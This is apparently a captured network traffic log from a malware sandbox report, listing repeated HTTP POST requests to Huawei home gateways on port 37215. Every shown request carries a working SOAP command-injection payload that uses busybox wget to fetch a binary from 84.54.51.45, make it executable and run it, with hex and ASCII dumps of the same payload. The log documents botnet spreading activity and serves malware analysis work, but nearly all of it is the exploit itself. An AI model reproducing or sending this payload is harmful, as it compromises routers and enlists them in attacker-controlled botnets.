                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            346192.168.2.1536010197.207.43.15337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781255007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            347192.168.2.1555124197.20.172.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781285048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            348192.168.2.1539106197.182.173.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781330109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            349192.168.2.1537536197.74.207.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781332970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            350192.168.2.1556286197.113.164.18937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781368017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            351192.168.2.1554734197.98.243.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781389952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            352192.168.2.1551814197.5.243.10937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781421900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            353192.168.2.1553552197.146.82.6237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781445026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            354192.168.2.1541952197.102.199.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781469107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            355192.168.2.1560440197.190.247.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781506062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 